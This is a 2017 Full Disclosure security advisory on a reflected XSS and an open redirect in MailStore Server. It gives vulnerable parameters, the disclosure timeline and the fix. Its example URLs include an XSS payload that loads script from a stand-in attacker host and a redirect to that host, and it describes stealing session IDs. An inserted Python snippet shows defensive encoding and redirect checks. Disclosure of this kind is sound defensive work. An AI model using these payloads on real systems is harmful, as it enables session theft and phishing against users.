Message-ID: <833eb4ffbe884069a47cb006f88cdbdd@TclanGroupware.secuvera.de>
Date: Wed, 1 Feb 2017 09:01:11 +0000
From: Tobias Glemser <tglemser@...uvera.de>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
 "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] secuvera-SA-2017-02: Reflected XSS and Open Redirect in
 MailStore Server

secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server

Affected Products
   MailStore Server version 10.0.1.12148 was tested.
   According to the vendor:
   - MailStore 9.2 to 10.0.1 is affected by the reflected XSS vulnerability
   - MailStore 9.0 to 10.0.1 is affected by the open redirect vulnerability

References
   https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt
   CWE-79 https://cwe.mitre.org/data/definitions/79.html
   CWE-601 https://cwe.mitre.org/data/definitions/601.html

Summary:
   "MailStore Server is one of the world’s leading solutions for email archiving, 
   management and compliance for small and medium-sized businesses."

   The built-in web application does not properly validate untrusted input in 
   several parameters. This leads to both reflected Cross-Site Scripting (XSS) 
   and an open redirect.

Effect:
   To exploit the reflected XSS, the victim has to be authenticated to the 
   MailStore web application. If the victim clicks a link sent by an attacker, 
   the injected script could for example copy the victim's session ID to a 
   data sink controlled by the attacker.

   With another crafted link, the attacker can redirect the victim to a 
   malicious website, even though the link itself points to the trusted 
   MailStore address. The victim does not need to be authenticated for this.

Vulnerable scripts, reflected XSS (authenticated users only):
   /search-result/, Parameters c-f, c-q, c-from and c-to 
   /message/ajax/send/, Parameter recipient

Vulnerable script, open redirect (no authentication required):
   /derefer/, Parameter url

Example for reflected XSS:
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E
   # Loads external JavaScript code from an attacker-controlled host
   https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E

Example for Open Redirect:
   https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de
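The two weaknesses above are fixed on the server side by output encoding that matches the reflection context and by an allowlist for redirect targets. The following is an added illustration of both checks, run over the advisory's own example query strings; it is not MailStore code, and the host allowlist `TRUSTED_HOSTS` and the function names are assumptions (`www.example.com` is the placeholder host from the examples above).

```python
import json
from html import escape
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist: the archive's own host plus any explicitly trusted domains.
TRUSTED_HOSTS = {"www.example.com"}


def safe_redirect_target(url: str, default: str = "/") -> str:
    """Accept `url` only if it stays on a trusted host; otherwise return `default`.

    Rejects absolute URLs to other hosts, scheme-relative URLs (//host),
    backslash variants (/\\host) and non-http(s) schemes such as javascript:.
    """
    url = url.strip()
    parts = urlsplit(url)
    if not parts.scheme and not parts.netloc:
        # Plain relative path: must start with a single "/" to stay on this origin.
        return url if url.startswith("/") and url[1:2] not in ("/", "\\") else default
    if parts.scheme not in ("http", "https"):
        return default
    host = (parts.hostname or "").lower()
    return url if host in TRUSTED_HOSTS else default


def render_in_html(term: str) -> str:
    """Encode a reflected parameter for an HTML text or attribute context."""
    return escape(term, quote=True)


def render_in_script(term: str) -> str:
    """Encode a reflected parameter for an inline <script> string context.

    The advisory's payload starts with "</script>", which means the value was
    reflected inside a script block; there the value must be JSON-encoded and
    "</" neutralised so the HTML parser cannot see a closing script tag.
    """
    return json.dumps(term).replace("</", "<\\/")


def handle_request(query_string: str) -> dict:
    """Decode a search-result/derefer query string and return the safe outputs."""
    qs = parse_qs(query_string, keep_blank_values=True)
    c_f = qs.get("c-f", [""])[0]
    return {
        "c-f-html": render_in_html(c_f),
        "c-f-script": render_in_script(c_f),
        "redirect": safe_redirect_target(qs.get("url", [""])[0]),
    }
```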

Solution:
   Update to Version 10.0.2

Disclosure Timeline:
   2017/01/09 vendor contacted
   2017/01/10 initial vendor response asking for technical details
   2017/01/10 provided vendor with the advisory including technical details
   2017/01/13 vendor provided information about affected versions and mitigation
   2017/01/18 update published by vendor
   2017/01/31 public disclosure
   
Credits:
   Tobias Glemser
   tglemser@...uvera.de
   secuvera GmbH
   https://www.secuvera.de

Disclaimer:
   All information is provided without warranty. The intent is to
   provide information to secure infrastructure and/or systems, not
   to be able to attack or damage. Therefore secuvera shall
   not be liable for any direct or indirect damages that might be
   caused by using this information.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
